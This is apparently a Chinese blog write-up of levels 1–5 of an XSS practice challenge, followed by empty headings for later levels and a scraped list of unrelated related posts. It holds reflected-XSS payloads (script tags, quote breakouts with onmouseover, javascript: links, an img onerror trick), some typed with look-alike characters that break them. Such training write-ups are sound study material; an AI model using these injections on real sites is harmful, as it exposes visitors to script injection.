XSS平台 XSS挑战之旅 解题记录 writeup

  • level1
  • level2
  • level3
  • level4
  • level5
  • level6
  • level7
  • level8
  • level9
  • level10
  • level11
  • level12
  • level13


XSS挑战之旅是一个练习简单XSS脚本注入的平台,通过检测弹窗判断用户是否通关。
但前几关存在bug,只要在网页源码图片链接处插入JavaScript代码即可产生弹窗,达到通关的目的。
:Google Chrome存在过滤弹窗,用Firefox浏览器。

<center><img src="level.png"></center>   //源码
<center><img src=x onerror=alert(1)></center>   //将其修改为这样即可bug通关

详尽的XSS跨站脚本攻击请看:XSS跨站脚本攻击原理与常见的脚本及《XSS跨站脚本攻击剖析与防御》摘录总结

level1


页面中没有输入点,但发现通过地址栏传入的参数‘name=test’会回显在页面,

http://test.xss.tv/level1.php?name=test

尝试通过在URL中构造payload完成XSS攻击:

http://test.xss.tv/level1.php?name=<script>alert(1);</script>

触发弹窗,完成的不错!通关。

level2


页面存在输入框,搜索的数据在页面有回显,在搜索框构造payload并提交:

<script>alert(1);</script>

返回的页面并没有触发弹窗,查看网页源代码:

<h1 align=center>欢迎来到level2</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1);&lt;/script&gt;相关的结果.</h2><center>
<form action=level2.php method=GET>
<input name=keyword  value="<script>alert(1);</script>">

发现在<h2>标签中,‘<>’符号被转译,但在<input>标签中‘value’的值完整显示了输入的payload,尝试闭合value的值,在输入框重新构造xss注入代码:

"><script>alert(1);</script>
//提交后源码变为:
<input name=keyword  value=""><script>alert(1);</script>">

触发弹窗,完成的不错!通关。

level3


页面存在输入框,搜索的数据在页面有回显,在搜索框构造payload并提交:

<script>alert(1);</script>

返回的页面并没有触发弹窗,查看网页源代码:

<h1 align=center>欢迎来到level3</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1);&lt;/script&gt;相关的结果.</h2><center>
<form action=level3.php method=GET>
<input name=keyword  value='&lt;script&gt;alert(1);&lt;/script&gt;'>

发现在<h2>和<input>标签中,‘<>’符号均被转译,尝试搜索“<"/()’>”,在网页源代码查看符号被转译的情况,发现‘<">‘被编码

<h2 align=center>没有找到和&lt;&quot;/()'&gt;相关的结果.</h2><center>
<form action=level3.php method=GET>
<input name=keyword  value='&lt;&quot;/()'&gt;'>

尝试闭合‘value’的值,通过事件触发弹窗,在输入框构造新的payload:

' οnmοuseοver='alert(1)
//提交后源码变为:
<input name=keyword  value='' onmouseover='alert(1)'>

鼠标移到输入框便触发事件产生弹窗,完成的不错!通关。

level4


页面存在输入框,搜索的数据在页面有回显,尝试搜索“<"/()’>”,在网页源代码中查看符号被转译的情况,

<h1 align=center>欢迎来到level4</h1>
<h2 align=center>没有找到和&lt;&quot;/()'&gt;相关的结果.</h2><center>
<form action=level4.php method=GET>
<input name=keyword  value=""/()'">

发现在<h2>标签中,‘<">’被编码,<input>标签里‘value’中的’<>'被替换为空白,尝试闭合‘value’的值,通过事件触发弹窗,在输入框构造新的payload:

" οnmοuseοver="alert(1)
//提交后源码变为:
<input name=keyword  value="" onmouseover="alert(1)">

鼠标移到输入框便触发事件产生弹窗,完成的不错!通关。

level5


页面存在输入框,搜索的数据在页面有回显,尝试搜索“<"/()’>”,在网页源代码中查看符号被转译的情况,

<h1 align=center>欢迎来到level5</h1>
<h2 align=center>没有找到和&lt;&quot;/()'&gt;相关的结果.</h2><center>
<form action=level5.php method=GET>
<input name=keyword  value="<"/()'>">

搜索"onmouseover"和’<script>alert(1);</script>’,在网页源代码中查看符号被转译的情况,

<input name=keyword  value="o_nmouseover">
<input name=keyword  value="<scr_ipt>alert(1);</script>">

发现在<h2>标签中,‘<">’被编码,<input>标签里‘value’中的‘onmouseover’被替换为‘o_nmouseover’,'script’被替换为scr_ipt,尝试闭合‘value’的值,通过<a href=>标签中的引用属性,在输入框构造新的payload:

"><a href="javascript:alert(1);">aaa</a>
//提交后源码变为:
<input name=keyword  value=""><a href="javascript:alert(1);">aaa</a>">


通过点击aaa链接,触发javascript脚本引用属性产生弹窗,完成的不错!通关。

level6

level7

level8

level9

level10

level11

level12

level13

XSS平台 XSS挑战之旅 解题记录 writeup相关推荐

  1. test.ctf8(XSS挑战之旅)解题记录

    xss平台网址:test.ctf8.com 过关条件:只有能够跳出完成得不错得提示框,即为过关 level1 第一关没啥好说得,入门题 payload <script>alert('abc ...

  2. XSS挑战之旅 解题记录

    本文记录xss挑战解题,检验自己的xss技术 题目链接 Level1 链接为http://test.xss.tv/level1.php?name=test 页面没有输入点 直接构造payloadnam ...

  3. 一枚亲斤手对中大SYSUMSClub的puzzle的解题记录(writeup)(2021-10)(G2T1me)

    0x00 写在前面 MSC Puzzle 是由中山大学 MSClub 与中山大学 W4terDr0p 战队联合举办的趣味性解谜游戏,内容除古典密码.数字谜题等经典谜题外,还包含部分需要基础计算机知识. ...

  4. 从零开始搭建轻量级个人XSS平台(BlueLotus_XSSReceiver-master蓝莲花)

    一. 前言 决定搭建XSS平台是因为自己想深入学习一下XSS相关的知识,多多进行实践,上网搜索了一下XSS平台有很多,但是总觉得不是很安全,这个毕竟敏感信息要传输到陌生人的服务器上,而且服务器端测试代 ...

  5. XSS平台的简单搭建和获取cookie

    搭建蓝莲花XSS平台. 1.什么是XSS平台 XSS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的 ...

  6. xss平台详解及练习

    文章目录 xss平台使用教程 练习 CTFhub web 反射型xss XSS平台 xss平台使用教程 xss平台使用教程 练习 CTFhub web 反射型xss 在第一栏处输入测试语句 <s ...

  7. 从xss挑战之旅来重读xss(一)

    在开始这篇文章之前,先简单聊几句: xss很多时候是鸡肋,比如说self-xss 很多厂商都会注明拒收反射xss,如58src 遇到请证明危害性的说法就走,人家的潜台词也是拒收反射xss 遇到收反射x ...

  8. XSS学习-XSS挑战之旅(二)

    前言:之前打XSS平台时,打到了第11关就没有继续了,现在有空了就继续打咯,再增加点关于XSS的知识. 第十一关 这关坑我好长时间,看了好多博客直接给说修改Referer,给截图中都有自带的Refer ...

  9. XSS挑战之旅---游戏通关攻略

    最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬Mramydnei,喜欢XSS的大家可以一起来学习交流. 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一 ...

最新文章

  1. [概统]本科二年级 概率论与数理统计 第四讲 连续型随机变量
  2. boost::hana::is_disjoint用法的测试程序
  3. 2010世界杯主题曲夏奇拉献唱《Waka Waka》
  4. 安装cuda 非root_linux非root用户下安装软件,搭建生产环境
  5. c#书写规范之---代码书写规范
  6. 712. Minimum ASCII Delete Sum for Two Strings
  7. day20线程Thread的sleep方法
  8. Vbs脚本编程简明教程之五
  9. 模式识别和机器学习的区别
  10. u盘稳定测试软件,u盘检测工具最新版
  11. 语音信号处理的一些基础知识
  12. data-toggle=dropdown/data-target/data-dismiss/data-backdrop/data-spy/data-slide/data-source是什么意思?
  13. Tigase8 SSL安全连接配置与代码实现
  14. 名表依波路borel_依波路手表排名 依波路手表世界排名第几
  15. java pow_Java pow()方法
  16. 程序员接私单需要注意的几大问题
  17. WINDOWS 耳机 有驱动 没声音
  18. 哪些晦涩难懂的shell命令都是什么的缩写?
  19. Spring Bean生命周期: Bean的实例化
  20. 我,35岁程序员,离职前是这么做的

热门文章

  1. Eigrp恶意插入路由和致瘫攻击测试(一)
  2. 福利贴:最全实时音视频开发要用到的开源工程汇总
  3. oracle基础语句练习
  4. 怎么隐藏label标签
  5. 使用python Basemap测站分布图(含站名)
  6. python爬取起点vip小说章节_python 爬取起点小说vip章节(失败)
  7. Java中的String类为什么不可变
  8. 给女朋友做个聊天机器人,这样就能安心写代码了
  9. transformer中QKV的通俗理解(渣男与备胎的故事)
  10. Jmeter 入门 从0-1 基础篇-实操